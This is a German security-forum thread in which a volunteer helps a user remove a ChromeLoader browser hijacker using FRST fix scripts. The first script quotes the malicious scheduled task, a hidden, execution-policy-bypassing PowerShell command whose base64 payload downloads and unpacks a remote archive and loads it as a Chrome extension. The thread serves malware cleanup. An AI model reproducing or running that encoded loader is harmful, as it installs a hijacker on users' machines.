Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   Windows 10: PowerShell öffnet sich selbstständig (https://www.trojaner-board.de/203267-windows-10-powershell-oeffnet-selbststaendig.html)

Tc1l 05.01.2022 17:04
Windows 10: PowerShell öffnet sich selbstständig
 
Liste der Anhänge anzeigen (Anzahl: 1)
Hallo Zusammen,

seit gestern Morgen öffnet und schließt sich PowerShell ganz plötzlich von selbst, außerdem schließt und öffnet es Chrome und anstatt der Standard Suchmaschine Google wird das gegoogelte durch 5 Suchmaschinen gejagt und am Ende kommt das Ergebnis mit Bing raus, jedes Mal wenn der Browser neu geladen wurde kommt eine Erweiterung namens „Settings“ hinzu, wenn ich diese Entferne funktioniert der Browser wieder ganz normal aber PowerShell öffnet sich trotzdem noch :confused:

ich bin mir nicht sicher vielleicht ist es ein Virus, verschieden Scanner haben etwas gefunden was aber nicht zur Lösung des Problems geführt hat

Die gewünschten Logfiles sind ebenfalls im Anhang, nur leider konnte ich sie nicht Formatieren da sie zu groß sind.


Vielen dank im Voraus

M-K-D-B 05.01.2022 17:44
:hallo:



Mein Name ist Matthias und ich werde dir bei der Analyse und der eventuell notwendigen Bereinigung deines Computers helfen.






Schritt 1
Führe Malwarebytes' AntiMalware (MBAM) gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei.





Schritt 2
  • Starte FRST erneut und klicke auf Untersuchen.
  • FRST erstellt nun zwei Logdateien (FRST.txt und Addition.txt).
  • Poste mir beide Logdateien mit deiner nächsten Antwort.





Bitte poste mit deiner nächsten Antwort:
  • die Logdatei von MBAM
  • die beiden neuen Logdateien von FRST (FRST.txt und Addition.txt)

Tc1l 05.01.2022 18:35
Windows 10: PowerShell öffnet sich selbstständig
 
Liste der Anhänge anzeigen (Anzahl: 1)
Vielen dank erstmal fürs Antworten

unten angehängt habe ich die 3 dateien :)

M-K-D-B 05.01.2022 19:14
Vielen Dank für die Logdateien.


Zitat:
Generic.Malware/Suspicious, C:\USERS\TILMU\ONEDRIVE\DESKTOP\GAMES\GTA\CHERAX LOADER\LOADER.EXE
Etwas Illegales?
Finger weg davon!



Jetzt gehts auf in den Kampf... :)






Schritt 1
WARNUNG AN ALLE MITLESER !!!
Dieses FRST-Script ist ausschließlich für diesen Nutzer gedacht und sollte niemals 1:1 für ein anderes System angewendet werden!
  • Speichere deine Arbeiten und schließe alle offenen Programme, damit keine Daten verloren gehen.
  • Kopiere den gesamten Inhalt der folgenden Code-Box:
    Code:
    Start::
    SystemRestore: On
    CreateRestorePoint:
    CloseProcesses:
    Unlock: C:\Windows\System32\Tasks\ChromeLoader
    VirusTotal: C:\Windows\System32\Tasks\ChromeLoader
    Task: {FF650B09-2BA7-407F-AD46-F0DDA995556C} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAaQBzAE8AcABlAG4AIAA9ACAAMAA7AAoACgAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACAALQBGAGkAbAB0AGUAcgAgACIAbgBhAG0AZQA9ACcAYwBoAHIAbwBtAGUALgBlAHgAZQAnACIAKQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAAQwBvAG0AbQBhAG4AZABMAGkAbgBlACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsACgAJAGkAZgAoACQAXwAgAC0ATQBhAHQAYwBoACAAIgBsAG8AYQBkAC0AZQB4AHQAZQBuAHMAaQBvAG4AIgApAHsACgAJAAkAYgByAGUAYQBrADsACgAJAH0ACgAKAAkAJABpAHMATwBwAGUAbgAgAD0AIAAxADsACgB9AAoACgBpAGYAKAAkAGkAcwBPAHAAZQBuACkAewAKAAoACQBpAGYAKAAtAG4AbwB0ACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAeAB0AFAAYQB0AGgAKQApAHsACgAKAAkACQAkAGEAcgBjAGgAaQB2AGUATgBhAG0AZQAgAD0AIAAiACQAKAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAKQBcAGEAcgBjAGgAaQB2AGUALgB6AGkAcAAiAAoACgAJAAkAdAByAHkAewAKAAkACQAJAHcAZwBlAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwBiAHIAbwBrAGUAbgBuAGEALgB3AG8AcgBrAC8AYQByAGMAaABpAHYAZQAuAHoAaQBwACIAIAAtAG8AdQB0AGYAaQBsAGUAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIACgAJAAkAfQBjAGEAdABjAGgAewAKAAkACQAJAGIAcgBlAGEAawAKAAkACQB9AAoACgAJAAkARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBMAGkAdABlAHIAYQBsAFAAYQB0AGgAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAAIgAkAGUAeAB0AFAAYQB0AGgAIgAKAAoACQB9AAoACgAJAHQAcgB5AHsACgAJAAkARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAYwBoAHIAbwBtAGUAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAEMAbABvAHMAZQBNAGEAaQBuAFcAaQBuAGQAbwB3ACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAfQAKAAkACQBzAHQAYQByAHQAIABjAGgAcgBvAG0AZQAgAC0ALQBsAG8AYQBkAC0AZQB4AHQAZQBuAHMAaQBvAG4APQAiACQAZQB4AHQAUABhAHQAaAAiACwAIAAtAC0AcgBlAHMAdABvAHIAZQAtAGwAYQBzAHQALQBzAGUAcwBzAGkAbwBuACwAIAAtAC0AbgBvAGUAcgByAGQAaQBhAGwAbwBnAHMALAAgAC0ALQBkAGkAcwBhAGIAbABlAC0AcwBlAHMAcwBpAG8AbgAtAGMAcgBhAHMAaABlAGQALQBiAHUAYgBiAGwAZQAKAAkAfQBjAGEAdABjAGgAewB9AAoACgB9AAoACgA= /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAaQBzAE8AcABlAG4AIAA9ACAAMAA7AAoACgAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACAAL (Der Dateneintrag hat 1683 mehr Zeichen). (Keine Datei) <==== ACHTUNG
    VirusTotal: C:\Users\tilmu\AppData\Local\archive.zip
    Unlock: C:\Users\tilmu\AppData\Local\chrome
    Folder: C:\Users\tilmu\AppData\Local\chrome
    Task: {ADDA7FEA-28FB-46F7-9FC1-B052A53F538B} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe (Keine Datei)
    IFEO\lotrbfme.exe: [Debugger]
    IFEO\lotrbfme2.exe: [Debugger]
    IFEO\lotrbfme2ep1.exe: [Debugger]
    IFEO\osppsvc.exe: [VerifierDlls] SppExtComObjHook.dll
    IFEO\SppExtComObj.exe: [VerifierDlls] SppExtComObjHook.dll
    GroupPolicy: Beschränkung ? <==== ACHTUNG
    Policies: C:\ProgramData\NTUSER.pol: Beschränkung <==== ACHTUNG
    HKLM\SOFTWARE\Policies\Mozilla\Firefox: Beschränkung <==== ACHTUNG
    CMD: ipconfig /flushdns
    CMD: netsh winsock reset catalog
    CMD: netsh advfirewall reset
    CMD: netsh advfirewall set allprofiles state ON
    CMD: Bitsadmin /Reset /Allusers
    CMD: Winmgmt /salvagerepository
    CMD: Winmgmt /resetrepository
    CMD: winmgmt /resyncperf
    CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R
    CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R
    CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R
    CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R
    Hosts:
    RemoveProxy:
    EmptyTemp:
    End::
  • Starte nun FRST und klicke direkt den Reparieren Button.
    Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
  • Gegebenenfalls muss dein Rechner neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.





Schritt 2
  • Starte FRST erneut und klicke auf Untersuchen.
  • FRST erstellt nun zwei Logdateien (FRST.txt und Addition.txt).
  • Poste mir beide Logdateien mit deiner nächsten Antwort.





Bitte poste mit deiner nächsten Antwort:
  • die Logdatei des FRST-Fix (fixlog.txt)
  • die beiden neuen Logdateien von FRST (FRST.txt und Addition.txt)

Tc1l 05.01.2022 19:42
Windows 10: PowerShell öffnet sich selbstständig
 
Liste der Anhänge anzeigen (Anzahl: 1)
Zitat:
Etwas Illegales?
Es ist ein Mod Menu. Genauer gesagt für Gta V, allerdings benutze ich dieses nur im Singleplayer was nicht verboten ist :)

Unten Angehängt sind die 3 neuen Dateien

M-K-D-B 05.01.2022 20:46
Vielen Dank für die Informationen und die Logdateien. ;)




Schritt 1
WARNUNG AN ALLE MITLESER !!!
Dieses FRST-Script ist ausschließlich für diesen Nutzer gedacht und sollte niemals 1:1 für ein anderes System angewendet werden!
  • Speichere deine Arbeiten und schließe alle offenen Programme, damit keine Daten verloren gehen.
  • Kopiere den gesamten Inhalt der folgenden Code-Box:
    Code:
    Start::
    VirusTotal: C:\Users\tilmu\AppData\Local\chrome\background.js
    CMD: type "C:\Users\tilmu\AppData\Local\chrome\background.js"
    VirusTotal: C:\Users\tilmu\AppData\Local\chrome\conf.js
    CMD: type "C:\Users\tilmu\AppData\Local\chrome\conf.js"
    VirusTotal: C:\Users\tilmu\AppData\Local\chrome\manifest.json
    CMD: type "C:\Users\tilmu\AppData\Local\chrome\manifest.json"
    VirusTotal: C:\Users\tilmu\AppData\Local\chrome\settings.png
    C:\Users\tilmu\AppData\Local\chrome
    VirusTotal: C:\Users\tilmu\AppData\Roaming\YyPgH72rT4GHH88.dll
    Policies: C:\ProgramData\NTUSER.pol: Beschränkung <==== ACHTUNG
    Reboot:
    End::
  • Starte nun FRST und klicke direkt den Reparieren Button.
    Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
  • Gegebenenfalls muss dein Rechner neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.

Tc1l 05.01.2022 21:05
Liste der Anhänge anzeigen (Anzahl: 1)
Okay hab ich gemacht

M-K-D-B 05.01.2022 21:10
Sehr gut! :daumenhoc

Und noch ein letztes Mal und anschließend eine Kontrolle.




Schritt 1
WARNUNG AN ALLE MITLESER !!!
Dieses FRST-Script ist ausschließlich für diesen Nutzer gedacht und sollte niemals 1:1 für ein anderes System angewendet werden!
  • Speichere deine Arbeiten und schließe alle offenen Programme, damit keine Daten verloren gehen.
  • Kopiere den gesamten Inhalt der folgenden Code-Box:
    Code:
    Start::
    Unlock: C:\Users\tilmu\AppData\Roaming\YyPgH72rT4GHH88.dll
    C:\Users\tilmu\AppData\Roaming\YyPgH72rT4GHH88.dll
    Unlock: C:\FRST
    Zip: C:\FRST\Quarantine
    Reboot:
    End::
  • Starte nun FRST und klicke direkt den Reparieren Button.
    Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
  • Gegebenenfalls muss dein Rechner neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.





Schritt 2
Mit Schritt x wurde ein .zip Archiv mit dem Schema < Datum_Uhrzeit.zip > (z. B. 20.02.2021_11.33.52.zip) auf deinem Desktop erstellt.
  • Besuche die Seite Submit a Malware Sample auf BleepingComputer.
  • Klicke auf Durchsuchen.
  • Wähle das erstellte .zip Archiv aus und klicke auf Öffnen.
  • Schreibe in das untere, leere Textfeld for M-K-D-B hinein und klicke auf den darunter liegenden Button Daten absenden.
  • Vielen Dank für deine Mitarbeit. Die hochgeladenen Dateien dienen zur Verbesserung der verwendeten Programme.





Schritt 3
  • Starte FRST erneut und klicke auf Untersuchen.
  • FRST erstellt nun zwei Logdateien (FRST.txt und Addition.txt).
  • Poste mir beide Logdateien mit deiner nächsten Antwort.





Bitte poste mit deiner nächsten Antwort:
  • die Logdatei des FRST-Fix (fixlog.txt)
  • eine Rückmeldung bezüglich des Hochladens des .zip Archivs
  • die beiden neuen Logdateien von FRST (FRST.txt und Addition.txt)

Tc1l 05.01.2022 21:21
Liste der Anhänge anzeigen (Anzahl: 3)
Hat alles geklappt bis auf das hochladen
Error Message: The size of your file is greater than maximum file size of 10 MBs.

M-K-D-B 05.01.2022 21:38
Dann wären wir durch!
Wenn du keine Probleme mehr mit Malware hast, dann sind wir hier fertig. Deine Logdateien sind sauber. :daumenhoc



Schritt 1
  • Wir empfehlen die regelmäßige Verwendung (z. B. alle zwei Wochen) von AdwCleaner und MBAM. Sie stören den Betrieb deines Antivirenprogramms nicht.
  • Wenn du die Tools dennoch entfernen möchtest, geht das ganz einfach.
    • MBAM:
    • Über Start > Einstellungen > Apps kannst du das Programm deinstallieren.
    • AdwCleaner:
    • Starte AdwCleaner und klicke in der linken Menüleiste auf Einstellungen.
    • Scrolle ganz nach unten und klicke unter dem Menüpunkt AdwCleaner entfernen auf Entfernen.





Schritt 2
  • Speichere deine Arbeiten und schließe alle offenen Programme, damit keine Daten verloren gehen.
  • Rechtsklicke auf FRST64 und wähle Umbenennen.
  • Benenne FRST64 in Uninstall um.
  • Starte Uninstall.
  • FRST und die dazugehörigen Dateien/Odner werden entfernt.
  • Klicke auf Ok, um den Rechner zum Abschluss neu zu starten.





Zum Schluss bitte unbedingt die Sicherheitsmaßnahmen lesen und umsetzen:

Lesestoff:
Anleitung: Maßnahmen zur Absicherung des Rechners



Wenn Du möchtest, kannst Du hier sagen, ob du mit mir und meiner Hilfe zufrieden warst...:dankeschoen:
Vielleicht möchtest du das Forum mit einer kleinen Spende https://www.trojaner-board.de/extra/spende.png unterstützen. :applaus:

Hinweis:
Bitte gib mir eine kurze Rückmeldung, sobald du die oben verlinkten Informationen gelesen hast, alles erledigt ist und keine Fragen mehr vorhanden sind, so dass ich dieses Thema aus meinen Abos löschen kann.

Tc1l 05.01.2022 21:48
Das Fenster taucht nichtmehr auf :)
Die Maßnahmen zur Absicherung werde ich mir auf jeden fall noch durchlesen


Vielen Lieben dank Für die Hilfe <3

M-K-D-B 06.01.2022 08:33
Wir sind froh, dass wir helfen konnten :abklatsch:

Dieses Thema scheint erledigt und wird aus unseren Abos gelöscht. Solltest Du das Thema erneut brauchen, schicke uns bitte eine Erinnerung inklusive Link zum Thema.

Jeder andere bitte hier klicken und ein eigenes Thema erstellen.


Alle Zeitangaben in WEZ +1. Es ist jetzt 03:15 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19